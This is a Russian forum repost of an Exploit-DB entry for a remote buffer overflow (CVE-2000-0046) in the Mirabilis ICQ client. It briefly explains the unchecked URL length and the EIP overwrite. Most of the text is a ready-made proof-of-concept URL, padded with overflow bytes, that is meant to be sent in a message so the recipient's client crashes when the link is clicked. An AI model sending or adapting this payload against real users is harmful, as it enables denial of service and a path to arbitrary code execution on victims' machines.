Exploit Mirabilis ICQ 0.99b 1.1.1.1/3.19 - Remote Buffer Overflow

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
19724
Проверка EDB
  1. Пройдено
Автор
DREW COPLEY
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2000-0046
Дата публикации
2000-01-12
Mirabilis ICQ 0.99b 1.1.1.1/3.19 - Remote Buffer Overflow
Код:
source: https://www.securityfocus.com/bid/929/info

ICQ is an individual to individual chat network which has clients installed on millions of computers around the world. It is, by far, the most widely used and is vulnerable to a remote buffer overflow. When the Mirabilis ICQ client parses an url recieved from another user _inside of a message_, it does not perform bounds checking on the length of the url. Because of this, it is possible to overwrite the EIP ("instruction pointer", or return address, that was pushed onto the stack when the offending function was first called) and execute arbitrary and possibly malicious code stuffed inside the oversized URL on the target host once the url is clicked on. 

Sending the following URL (with no line breaks) in a regular message to a user will cause their ICQ to crash (just a basic proof of concept, no real malicious exploit code included here) if they click on it:

http://www.yahoo.com/sites.asp?^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^à ^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^ Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^à ^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^ Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^à ^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^ Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^à ^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^ Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^à ^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^ Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^à ^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã!!!!·P !^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã
 
Источник
www.exploit-db.com

Похожие темы